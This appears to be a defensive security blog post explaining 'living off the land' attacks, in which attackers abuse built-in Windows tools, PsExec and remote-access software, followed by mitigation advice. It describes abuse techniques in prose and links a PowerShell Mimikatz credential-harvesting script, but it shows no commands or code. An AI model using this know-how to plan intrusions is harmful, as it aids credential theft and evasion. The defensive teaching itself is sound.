Introduction
Living off the land (LOTL) is a term that gets thrown around a lot at security conferences and webinars, but what does it mean? Living off the land attacks refer to an attacker leveraging what is already available in the environment rather than bringing along a whole bunch of custom software and malware. The benefit for the attacker is that their activities are less likely to flag antivirus applications because they are using trusted software.
Further, their actions are more likely to blend in with normal administrative tasks.
Think of the attacker as an enemy combatant infiltrating and attacking another country. If they are wearing a foreign uniform, speak a nonnative language, and bring equipment built in their home country, they will be spotted quickly.
On the other hand, if they live off the land, wear native civilian clothes from the victim country, speak the same language well, and build or acquire weapons readily available in the victim country, they are going to be harder to spot and more likely to succeed in their objective.
Digital Double-Edged Swords
But what kind of digital weapons can attackers procure in your environments, you ask?
Well, like the Peter Parker Principle says, “With great power, comes great responsibility.” The same tools that allow your administrators to be efficient and effective are double-edged swords that attackers will use against you in living off the land attacks.
Let’s look at what those are:
Native Windows Tools
The following tools are frequently leveraged for living off the land attacks once attackers have established a foothold in your environment.
Windows Command Processor (CMD.exe)
CMD.exe is a command-line console and is readily available on all Windows operating systems. It provides attackers with a basic terminal function they can interact with. While it lacks many of the features and functions of PowerShell (or the ability to run Visual Basic Scripts like its successors CScript and WScript), it is still regularly observed for basic information gathering or running malicious applications. CMD.exe is also capable of running batch scripts allowing attackers a degree of automation.
Windows Based Script Host (WScript.exe) and Console Based Script Host (CScript.exe)
Windows-Based and Console-Based Script hosts have similar functionality as CMD.exe but add the benefit of executing Visual Basic Scripts allowing for more attacker automation than its predecessor.
PowerShell
A time-tested administrative favorite, PowerShell is frequently used for living off the land attacks. For those unfamiliar with it, PowerShell is a robust scripting language that first appeared back in 2006. Its capabilities have improved drastically since then as new versions have come out, including cross-platform functionality. Attackers will use PowerShell to do almost anything you can imagine and often obfuscate their scripts in a variety of ways, Base_64 being one of the most popular.
There is even a PowerShell scripted version of the popular Mimikatz application ( https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 ) used to harvest credentials stored in a system’s memory. Even if (and this is a big IF) antivirus products detect the PowerShell version of Mimikatz, it is a breeze for attackers to modify or obfuscate it enough to slip past.
On a positive note, the newer versions of PowerShell provide dramatically better logging and forensic artifacts than their predecessors, including recorded commands in Windows Event Logs (C:\Windows\System32\Winevt\Logs\Windows Powershell.evtx & Microsoft-Windows-PowerShell%4Operational.evtx) and a history file (version 5+) found in %userprofile%\AppData\Roaming\Windows\PowerShell\PSReadline\ConsolHost_history.txt.
Task Scheduler Configuration Tool (schtasks.exe) and Scheduled Service Command Line Interface (at.exe)
Task Scheduler and Scheduled Service Command Line Interface are great for administrators to schedule things like applications to run, updates, or backups, but they are also handy for attackers to ensure their malware continues to maintain persistence or delay the detonation of malware. This can be done on the local system or remote systems. Attackers prefer at.exe for a couple of reasons.
First, it’s easier to use. Second, it runs as SYSTEM both locally and remotely.
https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/at
Microsoft HTML Application host (MSHTA.exe)
I’ve yet to see a legitimate use for this executable, but it comes along for the ride with Windows, and it is a favorite of attackers.
Microsoft HTML Application host is a standalone executable capable of running HTML Applications (.hta), VBScript, and JavaScript. Since this works without the use of a web browser, no associated browser security mechanisms will prevent whatever mshta.exe is used to execute.
https://docs.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)?redirectedfrom=MSDN
Registry Console Tool (reg.exe)
Registry Hives (and there are quite a few of them) are essentially databases where Windows stores all sorts of configuration settings, records certain events, and other miscellaneous data. These hives are critical for Windows to function properly and to customize the system to suit business needs. It’s also a staple among attackers for maintaining persistence, storing settings for malware, storing executables in subkeys, and much more.
A recent example is the creation of a “BlackLivesMatter” registry key, by Sodinokibi Ransomware, where configurations are stored in subkeys. This includes the file extension to be used for encrypted files.
Common persistence locations within the registry can be found here: https://attack.mitre.org/techniques/T1547/001/.
Windows Management Instrumentation Command-Line (wmic.exe)
Windows Management Instrumentation Command-Line is a command-line interface for WMI. Administrators find it useful for interrogating or changing system settings on local or remote systems. It can also be used to run executables or scripts.
Attackers like it for the same and can leverage it to evade some security controls like application allow listing.
Service Control Manager Configuration Tool (sc.exe)
Service Control Manager Configuration Tool is a command-line method for managing services on the system. It can be used for querying settings and turning services on or off. It’s used in living off the land attacks for both and can often be observed disabling security, backup, or other services that may keep files locked that attackers are looking to encrypt— like databases.
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config
Find String (QGREP) Utility (findstr.exe)
GREP is a well-known Unix/Linux utility for finding specific text within a specified file/folder set. Find String is a very similar Windows application that is used for the same. This makes it a great tool for attackers to leverage to search for things like plain text passwords and other confidential information.
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr
Whoami (whoami.exe)
Unlike the above executables, “whoami” is not one that I’ve seen leveraged for particularly nefarious purposes other than attackers checking whether they’ve successfully elevated, changed their permissions, or are performing additional reconnaissance.
Administrators will typically only use this command when doing some deep troubleshooting so seeing it executed is likely a good cause to investigate further.
But wait, there’s more…
The above executables are only a small portion of the native Windows tools that can be turned against you. For a more comprehensive list, check out the LOLBAS Project:
https://lolbas-project.github.io/#
Common Administrative Tools
The following are common, but not necessarily available in all environments. But if they are, these can be a bit like having your own gun turned on you by a burglar.
SysInternals
SysInternals is a Microsoft tool suite that offers some powerful resources that are commonly used by administrators and information technology troubleshooters.
One specific component used by attackers frequently is PsExec.exe—they often download it if it isn’t already available.
PsExec allows PowerShell to be run on remote machines, both good and evil.
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
Remote Management
LogMeIn, GoToMyPC, TeamViewer, VNC, Kaseya, Connect-Wise, etc., are often used within environments to make it easier for administrators to log into various systems from anywhere in the world.
In some cases, new remote access is installed or vendors push their own remote access programs, the old ones are never removed. There is no need for the bad guys to install something like Cobalt Strike for a back door when applications like this are already there.
What to Do?
Now you’ve seen some of the tools that exist in our environments that can be used in living off the land attacks.
So, how can we avoid attacks of this kind knowing that these are critical tools and functions to the success of our businesses?
Combatting Living Off the Land Attacks
Let’s be honest, there are a lot of aspects of information security that play out like this. Fortunately, there are some things that you can do to make the attackers’ lives more difficult and allow your defenders to detect them early.
PowerShell
As for PowerShell, there are a lot of opportunities to tighten this tool up. Here are a few things to consider:
- If you have folks leveraging PowerShell regularly, sign it. After that, any PowerShell being run that is not signed can either be blocked outright or raise the alarm bells for your incident responders.
- Enable PowerShell remoting and ban PsExec. This has more to do with how credentials are passed (or not passed in the case of PowerShell remoting) to the target system. Done right, it makes capturing credentials far less likely than if you are using PsExec, RunAs, or simply Remote Desktop-ing in.
- Ensure PowerShell logging is enabled and are being forwarded to a SIEM. Alert on anomalies like Base64 encoded PowerShell.
Software Asset Management
Know what is in your environment and what tools are normally used.
Not to pick on TeamViewer, but if TeamViewer is suddenly installed on a server or workstation and it’s not on an approved software list, somebody should start looking into it.
Establishing a software management process and getting rid of unapproved software will go a long way in removing potential options living off the land attacks. It will also help identify any new software attackers are trying to sneak in.
User Behavior Analytics
Forgive the buzzword, but conceptually, this is a technology that tracks what users normally do, applications they run, where they log on from, file shares accessed, etc.
That information should be fed into an algorithm that flags anomalies.
Perhaps your antivirus doesn’t catch custom malicious scripts because there’s no signature. Your user behavior analytics technology is likely going to alert you that the mailroom clerk’s user account suddenly reached out to every system in the environment when historically she’s rarely touched any system other than her desktop.
Credential Management
Credential Management is a big topic to address, but an important one. In general, the following recommendations should slow attackers down.
- Make a real effort to implement the Principle of Least Privilege. Don’t grant users access or rights that they don’t truly need for their job.
- Implement strong password policies, not just for everyday users, but for administrators and service accounts as well. Further, ensure those passwords are rotated regularly.
- Ensure users aren’t leveraging shared accounts to manage systems. This includes local administrator accounts—which could allow an attacker to easily move laterally across your environment.
- Speaking of local administrator accounts, implement Microsoft LAPS.
Network Segmentation
Piggybacking on the Principle of Least Privilege, implement network segmentation.
Consider the normal flow of data within your environment and throw up roadblocks for anything that deviates from that. For example, there’s little need for the accounting department desktops to be able to remote desktop or SSH into servers.
Multi-Factor Authentication
This is no longer optional. Usernames and passwords are just too easy to get ahold of on their own. All externally facing login portals should have MFA in place. If the technology you are using can’t, raise hell with the vendor and put it behind something that can until they get it fixed.
Employ or Hire Threat Hunters
If you’ve detected some malicious behavior but are struggling to separate the artifacts from the noise, it may be time to seek outside help or hire skilled threat hunters.
Conclusion
Attackers will constantly attempt to utilize whatever they can to infiltrate your environment. This includes using tools that you’re already leveraging for your business against you.
There must be a balance between creating operational efficiencies for your employees and giving attackers more vectors for living off the land attacks.
By understanding what tools are being used within your environment, understanding how attackers may be able to leverage them against you, and nailing the basic principles and tactics to help you combat this, you’ll be able to efficiently run your business with less risk.
If you need help with an inventory of your tools, with implementing some of the defense tactics mentioned above, or if you are concerned one of your tools is being leveraged against you by an attacker, please don’t hesitate to reach out to us. We’re happy to help.